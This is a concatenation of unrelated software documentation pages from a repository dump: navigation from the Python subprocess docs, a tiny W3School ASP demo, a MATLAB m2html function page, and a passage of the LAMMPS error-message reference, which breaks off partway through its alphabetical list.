<li><a class="reference internal" href="#exceptions">17.5.1.3. Exceptions</a></li>
</ul>
</li>
<li><a class="reference internal" href="#security-considerations">17.5.2. Security Considerations</a></li>
<li><a class="reference internal" href="#popen-objects">17.5.3. Popen Objects</a></li>
<li><a class="reference internal" href="#windows-popen-helpers">17.5.4. Windows Popen Helpers</a><ul>
<li><a class="reference internal" href="#constants">17.5.4.1. Constants</a></li>
</ul>
</li>
<li><a class="reference internal" href="#replacing-older-functions-with-the-subprocess-module">17.5.5. Replacing Older Functions with the <tt class="docutils literal"><span class="pre">subprocess</span></tt> Module</a><ul>
<li><a class="reference internal" href="#replacing-bin-sh-shell-backquote">17.5.5.1. Replacing /bin/sh shell backquote</a></li>
<li><a class="reference internal" href="#replacing-shell-pipeline">17.5.5.2. Replacing shell pipeline</a></li>
<li><a class="reference internal" href="#replacing-os-system">17.5.5.3. Replacing <tt class="docutils literal"><span class="pre">os.system()</span></tt></a></li>
<li><a class="reference internal" href="#replacing-the-os-spawn-family">17.5.5.4. Replacing the <tt class="docutils literal"><span class="pre">os.spawn</span></tt> family</a></li>
<li><a class="reference internal" href="#replacing-os-popen-os-popen2-os-popen3">17.5.5.5. Replacing <tt class="docutils literal"><span class="pre">os.popen()</span></tt>, <tt class="docutils literal"><span class="pre">os.popen2()</span></tt>, <tt class="docutils literal"><span class="pre">os.popen3()</span></tt></a></li>
<li><a class="reference internal" href="#replacing-functions-from-the-popen2-module">17.5.5.6. Replacing functions from the <tt class="docutils literal"><span class="pre">popen2</span></tt> module</a></li>
</ul>
</li>
<li><a class="reference internal" href="#legacy-shell-invocation-functions">17.5.6. Legacy Shell Invocation Functions</a></li>
<li><a class="reference internal" href="#notes">17.5.7. Notes</a><ul>
<li><a class="reference internal" href="#converting-an-argument-sequence-to-a-string-on-windows">17.5.7.1. Converting an argument sequence to a string on Windows</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h4>Previous topic</h4>
<p class="topless"><a href="concurrent.futures.html"
title="previous chapter">17.4. <tt class="docutils literal"><span class="pre">concurrent.futures</span></tt> — Launching parallel tasks</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="sched.html"
title="next chapter">17.6. <tt class="docutils literal"><span class="pre">sched</span></tt> — Event scheduler</a></p>
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="../bugs.html">Report a Bug</a></li>
<li><a href="../_sources/library/subprocess.txt"
rel="nofollow">Show Source</a></li>
</ul>
<div id="searchbox" style="display: none">
<h3>Quick search</h3>
<form class="search" action="../search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="../genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="../py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="sched.html" title="17.6. sched — Event scheduler"
>next</a> |</li>
<li class="right" >
<a href="concurrent.futures.html" title="17.4. concurrent.futures — Launching parallel tasks"
>previous</a> |</li>
<li><img src="../_static/py.png" alt=""
style="vertical-align: middle; margin-top: -1px"/></li>
<li><a href="https://www.python.org/">Python</a> »</li>
<li>
<span class="version_switcher_placeholder">3.4.3</span>
<a href="../index.html">Documentation</a> »
</li>
<li><a href="index.html" >The Python Standard Library</a> »</li>
<li><a href="concurrency.html" >17. Concurrent Execution</a> »</li>
</ul>
</div>
<div class="footer">
© <a href="../copyright.html">Copyright</a> 1990-2015, Python Software Foundation.
<br />
The Python Software Foundation is a non-profit corporation.
<a href="https://www.python.org/psf/donations/">Please donate.</a>
<br />
Last updated on Feb 26, 2015.
<a href="../bugs.html">Found a bug</a>?
<br />
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.3.
</div>
</body>
</html> |
Coding/W3School/W3CN/www.w3school.com.cn/example/aspe/demo_aspe_isclientconnected.html | platinhom/ManualHom | <html>
<!-- Mirrored from www.w3school.com.cn/example/aspe/demo_aspe_isclientconnected.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:09:56 GMT -->
<body>
用户仍然保持连接。
</body>
<!-- Mirrored from www.w3school.com.cn/example/aspe/demo_aspe_isclientconnected.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:09:56 GMT -->
</html> |
matlab/doc/enzyme-cost-minimization/ecm_scores/ecm_ecf4dmr.html | liebermeister/enzyme-cost-minimization | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>Description of ecm_ecf4dmr</title>
<meta name="keywords" content="ecm_ecf4dmr">
<meta name="description" content="[u_tot, u] = ecm_ecf4cmr(x,pp)">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="m2html © 2003 Guillaume Flandin">
<meta name="robots" content="index, follow">
<link type="text/css" rel="stylesheet" href="../../m2html.css">
</head>
<body>
<a name="_top"></a>
<div><a href="../../index.html">Home</a> > <a href="#">enzyme-cost-minimization</a> > <a href="#">ecm_scores</a> > ecm_ecf4dmr.m</div>
<!--<table width="100%"><tr><td align="left"><a href="../../index.html"><img alt="<" border="0" src="../../left.png"> Master index</a></td>
<td align="right"><a href="index.html">Index for ./enzyme-cost-minimization/ecm_scores <img alt=">" border="0" src="../../right.png"></a></td></tr></table>-->
<h1>ecm_ecf4dmr
</h1>
<h2><a name="_name"></a>PURPOSE <a href="#_top"><img alt="^" border="0" src="../../up.png"></a></h2>
<div class="box"><strong>[u_tot, u] = ecm_ecf4cmr(x,pp)</strong></div>
<h2><a name="_synopsis"></a>SYNOPSIS <a href="#_top"><img alt="^" border="0" src="../../up.png"></a></h2>
<div class="box"><strong>function [u_tot, u, w] = ecm_ecf4cmr(x,pp) </strong></div>
<h2><a name="_description"></a>DESCRIPTION <a href="#_top"><img alt="^" border="0" src="../../up.png"></a></h2>
<div class="fragment"><pre class="comment"> [u_tot, u] = ecm_ecf4cmr(x,pp)</pre></div>
<!-- crossreference -->
<h2><a name="_cross"></a>CROSS-REFERENCE INFORMATION <a href="#_top"><img alt="^" border="0" src="../../up.png"></a></h2>
This function calls:
<ul style="list-style-image:url(../../matlabicon.gif)">
</ul>
This function is called by:
<ul style="list-style-image:url(../../matlabicon.gif)">
<li><a href="../.././enzyme-cost-minimization/ecm_functions/ecm_get_score.html" class="code" title="function [u_cost, u] = ecm_get_score(ecm_score,x,pp)">ecm_get_score</a> </li><li><a href="../.././enzyme-cost-minimization/ecm_functions/ecm_get_specific_rates.html" class="code" title="function rates = ecm_get_specific_rates(ecm_score,x,pp,ind)">ecm_get_specific_rates</a> </li></ul>
<!-- crossreference -->
<hr><address>Generated on Tue 29-Mar-2016 14:09:28 by <strong><a href="http://www.artefact.tk/software/matlab/m2html/">m2html</a></strong> © 2003</address>
</body>
</html> |
doc/Section_errors.html | browndeer/lammps-ocl | <HTML>
<CENTER><A HREF = "Section_python.html">Previous Section</A> - <A HREF = "http://lammps.sandia.gov">LAMMPS WWW Site</A> -
<A HREF = "Manual.html">LAMMPS Documentation</A> - <A HREF = "Section_commands.html#comm">LAMMPS Commands</A> - <A HREF = "Section_history.html">Next
Section</A>
</CENTER>
<HR>
<H3>10. Errors
</H3>
<P>This section describes the various kinds of errors you can encounter
when using LAMMPS.
</P>
10.1 <A HREF = "#10_1">Common problems</A><BR>
10.2 <A HREF = "#10_2">Reporting bugs</A><BR>
10.3 <A HREF = "#10_3">Error & warning messages</A> <BR>
<HR>
<A NAME = "10_1"></A><H4>10.1 Common problems
</H4>
<P>If two LAMMPS runs do not produce the same answer on different
machines or different numbers of processors, this is typically not a
bug. In theory you should get identical answers on any number of
processors and on any machine. In practice, numerical round-off can
cause slight differences and eventual divergence of molecular dynamics
phase space trajectories within a few 100s or few 1000s of timesteps.
However, the statistical properties of the two runs (e.g. average
energy or temperature) should still be the same.
</P>
<P>If the <A HREF = "velocity.html">velocity</A> command is used to set initial atom
velocities, a particular atom can be assigned a different velocity
when the problem is run on a different number of processors or on
different machines. If this happens, the phase space trajectories of
the two simulations will rapidly diverge. See the discussion of the
<I>loop</I> option in the <A HREF = "velocity.html">velocity</A> command for details and
options that avoid this issue.
</P>
<P>Similarly, the <A HREF = "create_atoms.html">create_atoms</A> command generates a
lattice of atoms. For the same physical system, the ordering and
numbering of atoms by atom ID may be different depending on the number
of processors.
</P>
<P>Some commands use random number generators which may be setup to
produce different random number streams on each processor and hence
will produce different effects when run on different numbers of
processors. A commonly-used example is the <A HREF = "fix_langevin.html">fix
langevin</A> command for thermostatting.
</P>
<P>A LAMMPS simulation typically has two stages, setup and run. Most
LAMMPS errors are detected at setup time; others like a bond
stretching too far may not occur until the middle of a run.
</P>
<P>LAMMPS tries to flag errors and print informative error messages so
you can fix the problem. Of course, LAMMPS cannot figure out your
physics or numerical mistakes, like choosing too big a timestep,
specifying erroneous force field coefficients, or putting 2 atoms on
top of each other! If you run into errors that LAMMPS doesn't catch
that you think it should flag, please send an email to the
<A HREF = "http://lammps.sandia.gov/authors.html">developers</A>.
</P>
<P>If you get an error message about an invalid command in your input
script, you can determine what command is causing the problem by
looking in the log.lammps file or using the <A HREF = "echo.html">echo command</A>
to see it on the screen. For a given command, LAMMPS expects certain
arguments in a specified order. If you mess this up, LAMMPS will
often flag the error, but it may read a bogus argument and assign a
value that is valid, but not what you wanted. E.g. trying to read the
string "abc" as an integer value and assigning the associated variable
a value of 0.
</P>
<P>Generally, LAMMPS will print a message to the screen and logfile and
exit gracefully when it encounters a fatal error. Sometimes it will
print a WARNING to the screen and logfile and continue on; you can
decide if the WARNING is important or not. A WARNING message that is
generated in the middle of a run is only printed to the screen, not to
the logfile, to avoid cluttering up thermodynamic output. If LAMMPS
crashes or hangs without spitting out an error message first then it
could be a bug (see <A HREF = "#10_2">this section</A>) or one of the following
cases:
</P>
<P>LAMMPS runs in the available memory a processor allows to be
allocated. Most reasonable MD runs are compute limited, not memory
limited, so this shouldn't be a bottleneck on most platforms. Almost
all large memory allocations in the code are done via C-style malloc's
which will generate an error message if you run out of memory.
Smaller chunks of memory are allocated via C++ "new" statements. If
you are unlucky you could run out of memory just when one of these
small requests is made, in which case the code will crash or hang (in
parallel), since LAMMPS doesn't trap on those errors.
</P>
<P>Illegal arithmetic can cause LAMMPS to run slow or crash. This is
typically due to invalid physics and numerics that your simulation is
computing. If you see wild thermodynamic values or NaN values in your
LAMMPS output, something is wrong with your simulation. If you
suspect this is happening, it is a good idea to print out
thermodynamic info frequently (e.g. every timestep) via the
<A HREF = "thermo.html">thermo</A> so you can monitor what is happening.
Visualizing the atom movement is also a good idea to insure your model
is behaving as you expect.
</P>
<P>In parallel, one way LAMMPS can hang is due to how different MPI
implementations handle buffering of messages. If the code hangs
without an error message, it may be that you need to specify an MPI
setting or two (usually via an environment variable) to enable
buffering or boost the sizes of messages that can be buffered.
</P>
<HR>
<A NAME = "10_2"></A><H4>10.2 Reporting bugs
</H4>
<P>If you are confident that you have found a bug in LAMMPS, follow these
steps.
</P>
<P>Check the <A HREF = "http://lammps.sandia.gov/bug.html">New features and bug
fixes</A> section of the <A HREF = "http://lammps.sandia.gov">LAMMPS WWW
site</A> to see if the bug has already been reported or fixed or the
<A HREF = "http://lammps.sandia.gov/unbug.html">Unfixed bug</A> to see if a fix is
pending.
</P>
<P>Check the <A HREF = "http://lammps.sandia.gov/mail.html">mailing list</A>
to see if it has been discussed before.
</P>
<P>If not, send an email to the mailing list describing the problem with
any ideas you have as to what is causing it or where in the code the
problem might be. The developers will ask for more info if needed,
such as an input script or data files.
</P>
<P>The most useful thing you can do to help us fix the bug is to isolate
the problem. Run it on the smallest number of atoms and fewest number
of processors and with the simplest input script that reproduces the
bug and try to identify what command or combination of commands is
causing the problem.
</P>
<P>As a last resort, you can send an email directly to the
<A HREF = "http://lammps.sandia.gov/authors.html">developers</A>.
</P>
<HR>
<H4><A NAME = "10_3"></A>10.3 Error & warning messages
</H4>
<P>These are two alphabetic lists of the <A HREF = "#error">ERROR</A> and
<A HREF = "#warn">WARNING</A> messages LAMMPS prints out and the reason why. If the
explanation here is not sufficient, the documentation for the
offending command may help. Grepping the source files for the text of
the error message and staring at the source code and comments is also
not a bad idea! Note that sometimes the same message can be printed
from multiple places in the code.
</P>
<P>Also note that error messages from <A HREF = "Section_start.html#2_3">user-contributed
packages</A> are not listed here. Is such an
error occurs and is not self-explanatory, you'll need to look in the
source code or contact the author of the package.
</P>
<H4><A NAME = "error"></A>Errors:
</H4>
<DL>
<DT><I>1-3 bond count is inconsistent</I>
<DD>An inconsistency was detected when computing the number of 1-3
neighbors for each atom. This likely means something is wrong with
the bond topologies you have defined.
<DT><I>1-4 bond count is inconsistent</I>
<DD>An inconsistency was detected when computing the number of 1-4
neighbors for each atom. This likely means something is wrong with
the bond topologies you have defined.
<DT><I>All angle coeffs are not set</I>
<DD>All angle coefficients must be set in the data file or by the
angle_coeff command before running a simulation.
<DT><I>All bond coeffs are not set</I>
<DD>All bond coefficients must be set in the data file or by the
bond_coeff command before running a simulation.
<DT><I>All dihedral coeffs are not set</I>
<DD>All dihedral coefficients must be set in the data file or by the
dihedral_coeff command before running a simulation.
<DT><I>All dipole moments are not set</I>
<DD>For atom styles that define dipole moments for each atom type, all
moments must be set in the data file or by the dipole command before
running a simulation.
<DT><I>All improper coeffs are not set</I>
<DD>All improper coefficients must be set in the data file or by the
improper_coeff command before running a simulation.
<DT><I>All masses are not set</I>
<DD>For atom styles that define masses for each atom type, all masses must
be set in the data file or by the mass command before running a
simulation. They must also be set before using the velocity
command.
<DT><I>All pair coeffs are not set</I>
<DD>All pair coefficients must be set in the data file or by the
pair_coeff command before running a simulation.
<DT><I>All shapes are not set</I>
<DD>All atom types must have a shape setting, even if the particles
are spherical.
<DT><I>All universe/uloop variables must have same # of values</I>
<DD>Self-explanatory.
<DT><I>All variables in next command must be same style</I>
<DD>Self-explanatory.
<DT><I>Angle atom missing in delete_bonds</I>
<DD>The delete_bonds command cannot find one or more atoms in a particular
angle on a particular processor. The pairwise cutoff is too short or
the atoms are too far apart to make a valid angle.
<DT><I>Angle atom missing in set command</I>
<DD>The set command cannot find one or more atoms in a particular angle on
a particular processor. The pairwise cutoff is too short or the atoms
are too far apart to make a valid angle.
<DT><I>Angle atoms %d %d %d missing on proc %d at step %d</I>
<DD>One or more of 3 atoms needed to compute a particular angle are
missing on this processor. Typically this is because the pairwise
cutoff is set too short or the angle has blown apart and an atom is
too far away.
<DT><I>Angle coeff for hybrid has invalid style</I>
<DD>Angle style hybrid uses another angle style as one of its
coefficients. The angle style used in the angle_coeff command or read
from a restart file is not recognized.
<DT><I>Angle coeffs are not set</I>
<DD>No angle coefficients have been assigned in the data file or via the
angle_coeff command.
<DT><I>Angle potential must be defined for SHAKE</I>
<DD>When shaking angles, an angle_style potential must be used.
<DT><I>Angle style hybrid cannot have hybrid as an argument</I>
<DD>Self-explanatory.
<DT><I>Angle style hybrid cannot have none as an argument</I>
<DD>Self-explanatory.
<DT><I>Angle style hybrid cannot use same pair style twice</I>
<DD>Self-explanatory.
<DT><I>Angle table must range from 0 to 180 degrees</I>
<DD>Self-explanatory.
<DT><I>Angle table parameters did not set N</I>
<DD>List of angle table parameters must include N setting.
<DT><I>Angle_coeff command before angle_style is defined</I>
<DD>Coefficients cannot be set in the data file or via the angle_coeff
command until an angle_style has been assigned.
<DT><I>Angle_coeff command before simulation box is defined</I>
<DD>The angle_coeff command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Angle_coeff command when no angles allowed</I>
<DD>The chosen atom style does not allow for angles to be defined.
<DT><I>Angle_style command when no angles allowed</I>
<DD>The chosen atom style does not allow for angles to be defined.
<DT><I>Angles assigned incorrectly</I>
<DD>Angles read in from the data file were not assigned correctly to
atoms. This means there is something invalid about the topology
definitions.
<DT><I>Angles defined but no angle types</I>
<DD>The data file header lists angles but no angle types.
<DT><I>Another input script is already being processed</I>
<DD>Cannot attempt to open a 2nd input script, when the original file is
still being processed.
<DT><I>Arccos of invalid value in variable formula</I>
<DD>Argument of arccos() must be between -1 and 1.
<DT><I>Arcsin of invalid value in variable formula</I>
<DD>Argument of arcsin() must be between -1 and 1.
<DT><I>At least 1 proc could not allocate a CUDA gpu or memory</I>
<DD>You are not setup correctly to use a GPU from your CPU.
<DT><I>At least one process could not allocate a CUDA-enabled gpu</I>
<DD>Self-explanatory.
<DT><I>Atom IDs must be consecutive for velocity create loop all</I>
<DD>Self-explanatory.
<DT><I>Atom count changed in fix neb</I>
<DD>This is not allowed in a NEB calculation.
<DT><I>Atom count is inconsistent, cannot write restart file</I>
<DD>Sum of atoms across processors does not equal initial total count.
This is probably because you have lost some atoms.
<DT><I>Atom in too many rigid bodies - boost MAXBODY</I>
<DD>Fix poems has a parameter MAXBODY (in fix_poems.cpp) which determines
the maximum number of rigid bodies a single atom can belong to (i.e. a
multibody joint). The bodies you have defined exceed this limit.
<DT><I>Atom sort did not operate correctly</I>
<DD>This is an internal LAMMPS error. Please report it to the
developers.
<DT><I>Atom sorting has bin size = 0.0</I>
<DD>The neighbor cutoff is being used as the bin size, but it is zero.
Thus you must explicitly list a bin size in the atom_modify sort
command or turn off sorting.
<DT><I>Atom style hybrid cannot have hybrid as an argument</I>
<DD>Self-explanatory.
<DT><I>Atom style hybrid cannot use same atom style twice</I>
<DD>Self-explanatory.
<DT><I>Atom vector in equal-style variable formula</I>
<DD>Atom vectors generate one value per atom which is not allowed
in an equal-style variable.
<DT><I>Atom-style variable in equal-style variable formula</I>
<DD>Atom-style variables generate one value per atom which is not allowed
in an equal-style variable.
<DT><I>Atom_modify map command after simulation box is defined</I>
<DD>The atom_modify map command cannot be used after a read_data,
read_restart, or create_box command.
<DT><I>Atom_modify sort and first options cannot be used together</I>
<DD>Self-explanatory.
<DT><I>Atom_style command after simulation box is defined</I>
<DD>The atom_style command cannot be used after a read_data,
read_restart, or create_box command.
<DT><I>Attempt to pop empty stack in fix box/relax</I>
<DD>Internal LAMMPS error. Please report it to the developers.
<DT><I>Attempt to push beyond stack limit in fix box/relax</I>
<DD>Internal LAMMPS error. Please report it to the developers.
<DT><I>Attempting to rescale a 0.0 temperature</I>
<DD>Cannot rescale a temperature that is already 0.0.
<DT><I>Bad FENE bond</I>
<DD>Two atoms in a FENE bond have become so far apart that the bond cannot
be computed.
<DT><I>Bad grid of processors</I>
<DD>The 3d grid of processors defined by the processors command does not
match the number of processors LAMMPS is being run on.
<DT><I>Bad kspace_modify slab parameter</I>
<DD>Kspace_modify value for the slab/volume keyword must be >= 2.0.
<DT><I>Bad principal moments</I>
<DD>Fix rigid did not compute the principal moments of inertia of a rigid
group of atoms correctly.
<DT><I>Bias compute does not calculate a velocity bias</I>
<DD>The specified compute must compute a bias for temperature.
<DT><I>Bias compute does not calculate temperature</I>
<DD>The specified compute must compute temperature.
<DT><I>Bias compute group does not match compute group</I>
<DD>The specified compute must operate on the same group as the parent
compute.
<DT><I>Big particle in fix srd cannot be point particle</I>
<DD>Big particles must be extended spheriods or ellipsoids.
<DT><I>Bitmapped lookup tables require int/float be same size</I>
<DD>Cannot use pair tables on this machine, because of word sizes. Use
the pair_modify command with table 0 instead.
<DT><I>Bitmapped table in file does not match requested table</I>
<DD>Setting for bitmapped table in pair_coeff command must match table
in file exactly.
<DT><I>Bitmapped table is incorrect length in table file</I>
<DD>Number of table entries is not a correct power of 2.
<DT><I>Bond and angle potentials must be defined for TIP4P</I>
<DD>Cannot use TIP4P pair potential unless bond and angle potentials
are defined.
<DT><I>Bond atom missing in delete_bonds</I>
<DD>The delete_bonds command cannot find one or more atoms in a particular
bond on a particular processor. The pairwise cutoff is too short or
the atoms are too far apart to make a valid bond.
<DT><I>Bond atom missing in set command</I>
<DD>The set command cannot find one or more atoms in a particular bond on
a particular processor. The pairwise cutoff is too short or the atoms
are too far apart to make a valid bond.
<DT><I>Bond atoms %d %d missing on proc %d at step %d</I>
<DD>One or both of 2 atoms needed to compute a particular bond are
missing on this processor. Typically this is because the pairwise
cutoff is set too short or the bond has blown apart and an atom is
too far away.
<DT><I>Bond coeff for hybrid has invalid style</I>
<DD>Bond style hybrid uses another bond style as one of its coefficients.
The bond style used in the bond_coeff command or read from a restart
file is not recognized.
<DT><I>Bond coeffs are not set</I>
<DD>No bond coefficients have been assigned in the data file or via the
bond_coeff command.
<DT><I>Bond potential must be defined for SHAKE</I>
<DD>Cannot use fix shake unless bond potential is defined.
<DT><I>Bond style hybrid cannot have hybrid as an argument</I>
<DD>Self-explanatory.
<DT><I>Bond style hybrid cannot have none as an argument</I>
<DD>Self-explanatory.
<DT><I>Bond style hybrid cannot use same pair style twice</I>
<DD>Self-explanatory.
<DT><I>Bond style quartic cannot be used with 3,4-body interactions</I>
<DD>No angle, dihedral, or improper styles can be defined when using
bond style quartic.
<DT><I>Bond style quartic requires special_bonds = 1,1,1</I>
<DD>This is a restriction of the current bond quartic implementation.
<DT><I>Bond table parameters did not set N</I>
<DD>List of bond table parameters must include N setting.
<DT><I>Bond table values are not increasing</I>
<DD>The values in the tabulated file must be monotonically increasing.
<DT><I>Bond_coeff command before bond_style is defined</I>
<DD>Coefficients cannot be set in the data file or via the bond_coeff
command until an bond_style has been assigned.
<DT><I>Bond_coeff command before simulation box is defined</I>
<DD>The bond_coeff command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Bond_coeff command when no bonds allowed</I>
<DD>The chosen atom style does not allow for bonds to be defined.
<DT><I>Bond_style command when no bonds allowed</I>
<DD>The chosen atom style does not allow for bonds to be defined.
<DT><I>Bonds assigned incorrectly</I>
<DD>Bonds read in from the data file were not assigned correctly to atoms.
This means there is something invalid about the topology definitions.
<DT><I>Bonds defined but no bond types</I>
<DD>The data file header lists bonds but no bond types.
<DT><I>Both sides of boundary must be periodic</I>
<DD>Cannot specify a boundary as periodic only on the lo or hi side. Must
be periodic on both sides.
<DT><I>Boundary command after simulation box is defined</I>
<DD>The boundary command cannot be used after a read_data, read_restart,
or create_box command.
<DT><I>Box bounds are invalid</I>
<DD>The box boundaries specified in the read_data file are invalid. The
lo value must be less than the hi value for all 3 dimensions.
<DT><I>Can not specify Pxy/Pxz/Pyz in fix box/relax with non-triclinic box</I>
<DD>Only triclinic boxes can be used with off-diagonal pressure components.
See the region prism command for details.
<DT><I>Can not specify Pxy/Pxz/Pyz in fix nvt/npt/nph with non-triclinic box</I>
<DD>Only triclinic boxes can be used with off-diagonal pressure components.
See the region prism command for details.
<DT><I>Can only use NEB with 1-processor replicas</I>
<DD>This is current restriction for NEB as implemented in LAMMPS.
<DT><I>Cannot (yet) use PPPM with triclinic box</I>
<DD>This feature is not yet supported.
<DT><I>Cannot change box to orthogonal when tilt is non-zero</I>
<DD>Self-explanatory
<DT><I>Cannot change box with certain fixes defined</I>
<DD>The change_box command cannot be used when fix ave/spatial or
fix/deform are defined .
<DT><I>Cannot change box with dumps defined</I>
<DD>Self-explanatory.
<DT><I>Cannot change dump_modify every for dump dcd</I>
<DD>The frequency of writing dump dcd snapshots cannot be changed.
<DT><I>Cannot change dump_modify every for dump xtc</I>
<DD>The frequency of writing dump xtc snapshots cannot be changed.
<DT><I>Cannot change timestep once fix srd is setup</I>
<DD>This is because various SRD properties depend on the timestep
size.
<DT><I>Cannot change timestep with fix pour</I>
<DD>This fix pre-computes some values based on the timestep, so it cannot
be changed during a simulation run.
<DT><I>Cannot compute PPPM G</I>
<DD>LAMMPS failed to compute a valid approximation for the PPPM g_ewald
factor that partitions the computation between real space and k-space.
<DT><I>Cannot create an atom map unless atoms have IDs</I>
<DD>The simulation requires a mapping from global atom IDs to local atoms,
but the atoms that have been defined have no IDs.
<DT><I>Cannot create atoms with undefined lattice</I>
<DD>Must use the lattice command before using the create_atoms
command.
<DT><I>Cannot create_atoms after reading restart file with per-atom info</I>
<DD>The per-atom info was stored to be used when by a fix that you
may re-define. If you add atoms before re-defining the fix, then
there will not be a correct amount of per-atom info.
<DT><I>Cannot create_box after simulation box is defined</I>
<DD>The create_box command cannot be used after a read_data, read_restart,
or create_box command.
<DT><I>Cannot delete group all</I>
<DD>Self-explanatory.
<DT><I>Cannot delete group currently used by a compute</I>
<DD>Self-explanatory.
<DT><I>Cannot delete group currently used by a dump</I>
<DD>Self-explanatory.
<DT><I>Cannot delete group currently used by a fix</I>
<DD>Self-explanatory.
<DT><I>Cannot delete group currently used by atom_modify first</I>
<DD>Self-explanatory.
<DT><I>Cannot displace_atoms after reading restart file with per-atom info</I>
<DD>This is because the restart file info cannot be migrated with the
atoms. You can get around this by performing a 0-timestep run which
will assign the restart file info to actual atoms.
<DT><I>Cannot displace_box after reading restart file with per-atom info</I>
<DD>This is because the restart file info cannot be migrated with the
atoms. You can get around this by performing a 0-timestep run which
will assign the restart file info to actual atoms.
<DT><I>Cannot displace_box on a non-periodic boundary</I>
<DD>Self-explanatory.
<DT><I>Cannot dump sort on atom IDs with no atom IDs defined</I>
<DD>Self-explanatory.
<DT><I>Cannot evaporate atoms in atom_modify first group</I>
<DD>This is a restriction due to the way atoms are organized in
a list to enable the atom_modify first command.
<DT><I>Cannot find delete_bonds group ID</I>
<DD>Group ID used in the delete_bonds command does not exist.
<DT><I>Cannot have both pair_modify shift and tail set to yes</I>
<DD>These 2 options are contradictory.
<DT><I>Cannot open AIREBO potential file %s</I>
<DD>The specified AIREBO potential file cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open COMB potential file %s</I>
<DD>The specified COMB potential file cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open EAM potential file %s</I>
<DD>The specified EAM potential file cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open EIM potential file %s</I>
<DD>The specified EIM potential file cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open MEAM potential file %s</I>
<DD>The specified MEAM potential file cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open Stillinger-Weber potential file %s</I>
<DD>The specified SW potential file cannot be opened. Check that the path
and name are correct.
<DT><I>Cannot open Tersoff potential file %s</I>
<DD>The specified Tersoff potential file cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open dir to search for restart file</I>
<DD>Using a "*" in the name of the restart file will open the current
directory to search for matching file names.
<DT><I>Cannot open dump file</I>
<DD>The output file for the dump command cannot be opened. Check that the
path and name are correct.
<DT><I>Cannot open file %s</I>
<DD>The specified file cannot be opened. Check that the path and name are
correct.
<DT><I>Cannot open fix ave/correlate file %s</I>
<DD>The specified file cannot be opened. Check that the path and name are
correct.
<DT><I>Cannot open fix ave/histo file %s</I>
<DD>The specified file cannot be opened. Check that the path and name are
correct.
<DT><I>Cannot open fix ave/spatial file %s</I>
<DD>The specified file cannot be opened. Check that the path and name are
correct.
<DT><I>Cannot open fix ave/time file %s</I>
<DD>The specified file cannot be opened. Check that the path and name are
correct.
<DT><I>Cannot open fix poems file %s</I>
<DD>The specified file cannot be opened. Check that the path and name are
correct.
<DT><I>Cannot open fix print file %s</I>
<DD>The output file generated by the fix print command cannot be opened
<DT><I>Cannot open fix qeq/comb file %s</I>
<DD>The output file for the fix qeq/combs command cannot be opened.
Check that the path and name are correct.
<DT><I>Cannot open fix reax/bonds file %s</I>
<DD>The output file for the fix reax/bonds command cannot be opened.
Check that the path and name are correct.
<DT><I>Cannot open fix tmd file %s</I>
<DD>The output file for the fix tmd command cannot be opened. Check that
the path and name are correct.
<DT><I>Cannot open fix ttm file %s</I>
<DD>The output file for the fix ttm command cannot be opened. Check that
the path and name are correct.
<DT><I>Cannot open gzipped file</I>
<DD>LAMMPS is attempting to open a gzipped version of the specified file
but was unsuccessful. Check that the path and name are correct.
<DT><I>Cannot open input script %s</I>
<DD>Self-explanatory.
<DT><I>Cannot open log.lammps</I>
<DD>The default LAMMPS log file cannot be opened. Check that the
directory you are running in allows for files to be created.
<DT><I>Cannot open logfile %s</I>
<DD>The LAMMPS log file specified in the input script cannot be opened.
Check that the path and name are correct.
<DT><I>Cannot open logfile</I>
<DD>The LAMMPS log file named in a command-line argument cannot be opened.
Check that the path and name are correct.
<DT><I>Cannot open pair_write file</I>
<DD>The specified output file for pair energies and forces cannot be
opened. Check that the path and name are correct.
<DT><I>Cannot open restart file %s</I>
<DD>Self-explanatory.
<DT><I>Cannot open screen file</I>
<DD>The screen file specified as a command-line argument cannot be
opened. Check that the directory you are running in allows for files
to be created.
<DT><I>Cannot open universe log file</I>
<DD>For a multi-partition run, the master log file cannot be opened.
Check that the directory you are running in allows for files to be
created.
<DT><I>Cannot open universe screen file</I>
<DD>For a multi-partition run, the master screen file cannot be opened.
Check that the directory you are running in allows for files to be
created.
<DT><I>Cannot read_data after simulation box is defined</I>
<DD>The read_data command cannot be used after a read_data,
read_restart, or create_box command.
<DT><I>Cannot read_restart after simulation box is defined</I>
<DD>The read_restart command cannot be used after a read_data,
read_restart, or create_box command.
<DT><I>Cannot redefine variable as a different style</I>
<DD>An equal-style variable can be re-defined but only if it was
originally an equal-style variable.
<DT><I>Cannot replicate 2d simulation in z dimension</I>
<DD>The replicate command cannot replicate a 2d simulation in the z
dimension.
<DT><I>Cannot replicate with fixes that store atom quantities</I>
<DD>Either fixes are defined that create and store atom-based vectors or a
restart file was read which included atom-based vectors for fixes.
The replicate command cannot duplicate that information for new atoms.
You should use the replicate command before fixes are applied to the
system.
<DT><I>Cannot reset timestep with a dynamic region defined</I>
<DD>Dynamic regions (see the region command) have a time dependence.
Thus you cannot change the timestep when one or more of these
are defined.
